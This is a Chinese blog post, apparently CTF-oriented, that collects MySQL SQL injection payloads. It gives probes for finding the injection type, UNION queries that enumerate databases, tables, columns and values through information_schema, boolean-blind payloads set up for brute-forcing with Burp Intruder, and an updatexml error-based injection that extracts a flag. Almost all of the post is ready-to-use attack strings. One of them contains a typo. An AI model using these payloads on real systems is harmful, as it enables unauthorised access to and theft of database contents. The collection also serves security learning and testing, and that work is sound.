SQL注入payload（持续更新）

Posted 2021-09-16 Zeker62

mysql

//判断注入类型
?id=1'
?id=1"
?id=''
?id=""
?id=")
?id=')
?id=3-1 //判断数字型 

%20 //空格编码
%23 //#编码
limit 1,1 //取结果第一个记录的后一条记录（即第二条记录）
limit 0,1 //取第一条记录
database() //获取数据库

substr([str],[start],[length]) //切割字符串中从number1到number2的字符
substring() //和上面一样

concat(str1,str2,...) //将str1，str2……结合成一个字符串
比如：concat(username,0x7e,password) //0x7e是波浪号~
group_concat() //将里面的内容合并成一串字符串

mid([column name],start,[length]) //针对某一列提取字符串

updatexml([document], [XPath], [value]) //document为文档名称，xpath为文档路径，value为替换查找到的符合条件的数据，这个函数的目的是为了修改符合条件的节点的值。

//mysql 5.0+
//information_schema 这个库拥有所有的数据库的数据库名，字段名，表名
eg: information_schema.tables //查询所有表名

//常规（联合）注入
id='1' order by 3 --+ //%20是空格，%23是#
id='2' and 1=2 union select 1,2,datbase()--+ //查数据库
id='3' and 1=2 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+ //查表
id='4' and 1=2 union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() --+ //查字段
id='5' and 1=2 union select 1,2,[column name] from [table name] --+ //查值

//基本报错注入
name='admin'+and+if(length(database())=[number],true,false)%23
name='admin'+and+substr(database(),$1$,1)='$f$'%23  //放入intruder爆破
name='admin'+AND+substr((SELECT+group_concat(table_name)+FROM+information_schema.tables+WHERE+table_schema=database()),$1$,1)='$a$'%23
name='admin'+AND+substr((SELECT+group_concat(column_name)+FROM+information_schema.columns+WHERE+table_schema=database()),$1$,1)='$a$'%23
named='admin'+AND+substr((SELECT+group_concat([column name])+FROM+[table name]),1,1)='a'%23

//updatexml报错注入
//upatexml在执行的时候，第二个参数应该是合法的xpath路径，否则会报错将传参输出
//xpath路径写法：https://www.cnblogs.com/pythonywy/p/11082153.html
//把信息传入第二个参数即可：
name=admin'+or+updatexml(1,concat(0x7e,(select+flag+from+fl4g)),1)%23